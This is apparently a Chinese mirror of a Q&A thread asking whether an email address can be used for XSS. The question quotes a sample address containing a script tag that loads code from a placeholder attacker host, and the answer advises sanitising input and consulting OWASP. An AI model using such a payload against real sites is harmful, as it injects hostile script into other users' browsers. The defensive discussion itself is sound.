那些遇到过的问题

通过电子邮件地址可以进行XSS攻击吗?

Laj*_*pad 5 security email xss email-formats

我想知道电子​​邮件地址是否可以用于XSS攻击.

我们假设有一个网站可以注册并提供他的电子邮件地址.如果想要攻击给定的网站,他或她可能会创建一个电子邮件地址,例如:

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com
Run Code Online (Sandbox Code Playgroud)

然后使用此电子邮件地址攻击该网站.

电子邮件地址中是否允许引用或脚本标记?

dev*_*ull 5

示例中的电子邮件地址似乎有效.唯一不寻常的特征是引用"- 其他的是有效的.

维基百科建议您指定的电子邮件地址有效.

您需要确保在呈现之前对任意用户输入进行清理.

首先,您可能需要参考OWASP提供的有关XSS预防的信息.

归档时间:

查看次数:

4458 次

最近记录:

7 年,11 月 前
相关归档
PHP会话变量有多安全? 51
反CSRF令牌和Javascript 29
如何保护自己免受gzip或bzip2炸弹袭击? 18
反跨域政策的重点是什么? 7
从iPhone调用Amazon S3服务有多安全? 6
是否可以通过样式表进行跨域攻击? 6
as3 AIR for android - 应用程序 - 沙箱内容错误 5
使用Intent时不显示电子邮件正文 3
如何让$ _SESSION更安全? 2
发送电子邮件 - 使用DB或Web应用程序 0
难疑归档
如何禁用textarea的resizable属性? 2541
Java中的"实现Runnable"与"扩展线程" 2023
打印Java数组最简单的方法是什么? 1852
lodash和下划线之间的差异 1566
如何离开/退出/停用python virtualenv? 1461
将文件从Docker容器复制到主机 1438
如何在python字符串中打印文字大括号字符并在其上使用.format? 1320
漂亮的git分支图 1290
基于容器宽度的字体缩放 1083
使用node.js作为简单的Web服务器 1068